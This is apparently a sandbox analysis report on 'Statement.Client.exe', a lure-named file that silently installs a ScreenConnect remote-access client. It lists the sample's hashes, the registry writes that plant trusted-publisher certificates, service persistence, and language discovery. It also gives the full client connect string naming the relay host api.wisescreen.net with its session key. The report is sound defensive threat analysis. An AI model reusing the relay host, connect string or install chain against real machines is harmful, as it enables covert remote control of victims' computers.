72b2d87cf942f3c5dd92927098f59813c86ff94aa7805f82c70fec379a91e371

Analysis

max time kernel
117s
max time network
141s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-12-2024 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Statement.Client.exe
Size

81KB
MD5

096c0bb01099ae31a11f12c4643b02de
SHA1

5fecc71c4991d3bd64142fee92d5dd9cb689743c
SHA256

72b2d87cf942f3c5dd92927098f59813c86ff94aa7805f82c70fec379a91e371
SHA512

52395e5e344cb6ce5e9b92db081c8c5ca240df18917c25ba876793dcee4774b42b80356a6cf47d854a2f5a5179f4ffd0e64cfa79056960b9f479e0e1934b428c
SSDEEP

1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaWPBJYYb7xJoZ:7enkyfPAwiMq0RqRfbaWZJYYbj0

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 2 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	Statement.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	Statement.Client.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (242614d5-9b0d-42a9-99bd-6fcc80ac8cc3)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\6PXN8640.0OC\\HY6OTL7X.XJ3\\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAGEOdhJL7xUyoNtQPkf0TnQAAAAACAAAAAAAQZgAAAAEAACAAAAAMNOEU%2bJZW3jZTLnqbVtCRkKfIaF%2f2ifhm6dkrHP6zxAAAAAAOgAAAAAIAACAAAADtXlorqRWFduzxZ8uZIKAqaoaCI15ocyNM3WfnkKRA%2b6AEAACAzyk9IDdKGUFGsy9Dx41YFFrvJi8wSHrQH0S%2f0znqnno1aZqG%2buvkCjbjHyics0jFeXtvpWfxlrLn5G2pjxsaU32Sx5xwvNOjaMrKCo2sKDIBA2lQUmvdMDIqEGCMOOKQ5%2bRj66wGaXhRwsqBqLS5%2fogkLBjlUVsnR84CyecP7s2O0FI9ErZCp0pna8SSC%2fr8qXUM1rH92fpwNE3yMNgMyaQkvZ6dcPiHdEqknTQ%2fpAC039gMs98DLv0VUTmdYGTkOkQYjUJhBCQeBJUGroD7A8mzFJiAkAEFiZwxNcC1UB0%2b5CoK%2fn2698Ayk8tXKUxZvfnMyNOcBPMlnx71Ze2PUFWaICepCN13J916f6zciWREKrRncrqEBrp1BOxSfYjb4MfSXdT%2bwbw67%2fcvQL7DmVvI9o8gYtx%2fb%2bkY3kMXwIVouBl6CPL3WBi5DVqcucu1PjUzqKUWJZgXIuyktWyUY24Hx1AKMA6zFQBwPebVGw66NDuoucsbnV2%2fTLbnmHvRvFQXbNenFs0ipcD0z3afKJ%2b1P78PlZyV%2fCOabLzoUtiAArMpmXqji2iHNzMLtGYsj7IRhhwXrghKtIO0gruGLxNC8%2fn8xlLS4vjXA0rOXherQEZccx3Z3oWgkJK67kthShDY1Ip5sQ1okk2oXppevR8MjY1cJgpMy%2bg8Wk9PPD%2brTYWp8YMyfB0xZfFBrl0hI5aWMjycYKeha1qaApebI%2fM%2bFx0mHoz3eNluNizJ2h14QMfXdJoQlNx7wfIpEjqle3%2fr5617%2fWZt91eyWCAuNRe8QtiTO36YNV5y4JCr4pUO40UWWCSuN6f1HV7VW9YlAvvFhTGwG9VFGlSOnsN72MKHKoXut8GfSFAlZzS02IK46NpqtJv6z7Buob3i8ExtJxailnuRSDXMEMSrGCUjeVc5QzdVLXjjTo8s5MKC41z5X64rbzOR4IqUlR73kn3RM4m30AGkNCR79MoQ3E0%2fZtOs0qcqZwRoJimZuxdFlX84kv%2bTtglxIvy3RvPO%2bVCCnq92Q0L1gJmG5SH2boV7vTnFsV%2bu79ka2NiTv2tUjXxAuEqL5aC44rsZYuQRIOrpWXSLU2BVt6rUMGO91sy9z3%2bMcEOzNkxbvCjYsoec%2f8u9gQzLvkGX3aSEqfhkWaV3Dl4ttPGtdNkwH0QGTqH9F5Rjy4rSMa%2fXr4PcaBdWMSHgDIIagdW0eT%2fT8F3VRnEkc02XocNZGTihAGF%2b0VoknZEkSVlsQGJ7QjbT6G1YXjTCqy0hpsAPUaf9VJtCXziidR789N4j%2bs6u5WGH304umSuDFC2so62IhDoaMDBkD8JHU0rlV2Q67UytTB6gHGQgHSsBUsmeQAUMYTE%2fPyTNY48fFGymGt4WevN%2f0jJwvaZ5n4IRJs8hmnJfcLvtaPBcq%2fPzLdAJMPwNB73Lc4hvxY%2b7AEZOMmiJzqswWBkGXApPHEqUhgjDqIyfBhwTXpBHkHE2aTg3bhvCfTucMmnWWeIj%2frdCE5nyaeTMBNdFr477oJP6MtBhKC7PfJqLheEj%2fXQk8WUGZpib5vk4r5cnIBLhyvo3BF0eMirNU0%2fkLUAAAADhhO39krxt6GQfRanYZLy9T%2by6LoqQQBMvWw%2f%2bVIqqs%2fGGmqvKIIvVMBTAuurBZHLYWHKg2TSLXhZF1OsY2ev1&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe

Executes dropped EXE 4 IoCs

pid	Process
800	ScreenConnect.WindowsClient.exe
3040	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2212	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Statement.Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\lock!0e000000a9dc760ff4030000a806000000000000000000007 = 30303030303366342c30316462343766383838666631656130	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 460061006c00730065000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\DigestValue = 0203b65e92d2d1200dd695fe4c334955befbddd3	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\lock!14000000d7dc760f200300004c04000000000000000000009 = 30303030303332302c30316462343766383930646234626430	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\lock!12000000d7dc760f200300004c04000000000000000000009 = 30303030303332302c30316462343766383930646234626430	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\HasRunBefore = 01	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb09	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 680074007400700073003a002f002f007300650063007500720065002e0074006f006400650073006b002e00680065006c0070002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e003f0065003d0053007500700070006f0072007400260079003d0047007500650073007400260068003d006100700069002e007700690073006500730063007200650065006e002e006e0065007400260070003d003800300034003100260073003d00320034003200360031003400640035002d0039006200300064002d0034003200610039002d0039003900620064002d0036006600630063003800300061006300380063006300330026006b003d0042006700490041004100410043006b0041004100420053005500300045007800410041006700410041004100450041004100510044007400510038006a00690054006a005600660061007a0050004a00530071004a003200580045006f006100710061004b0046004f007a005a0036003000350079007a003600680059004900760038004d0037006f004f006e006c0077006600440057006600650033007600320074005500640045004f0031007800470071004a006400690055005a007600660034004a006f00620030006800370037004e00250032006600330078007900440070006500630038002500320062004900580076005a0046006400650045005100760036005a006d006b0074006500440034007700340056003700430061006900720042003700380066004e0061004e006e00510048006400410054004e006e004f0063005700580056006100580033007a006a007800590049006a00320065006800380063004b00560046007200390077007700490070007300310056004b0070004f004d0039004a005400710034007400500067005800580025003200660061006700300061006d0044007a00540043003100760037006100480037007a00740041004a006f00420052006e006500560064006f0031006d0053004a006f00640037006f004c003700310033004d00590053004a0041004300350063006c00720059004800500065004a0055006f00430067004100680076003900550075004e006f007600700076007400350031004e006a0042003500460075005a007600670057005000330032006d00430075007700700072004a0070006f006c0061007800660052007500730077004f006d0038003700390043006f005500700048006400360038004200450078006d00780053006800710041006e00390073004c0064004c006a006a00350033006b00710077007300690078004d00540072003100770068005800320025003200620032004700480052006a0033005100670077003900650078004f0038004f003800260072003d00260069003d0055006e007400690074006c0065006400250032003000530065007300730069006f006e000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\OnlineAppQuotaUsageEstimate = "3583844"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\lock!08000000a9dc760ff4030000a806000000000000000000007 = 30303030303366342c30316462343766383838666631656130	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\lock!16000000d7dc760f200300004c04000000000000000000009 = 30303030303332302c30316462343766383930646234626430	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777a = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\lock!1a000000d7dc760f200300004c04000000000000000000009 = 30303030303332302c30316462343766383930646234626430	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\lock!1c000000d7dc760f200300004c04000000000000000000009 = 30303030303332302c30316462343766383930646234626430	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 32003000320034002f00310032002f00300036002000310036003a00300034003a00340034000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
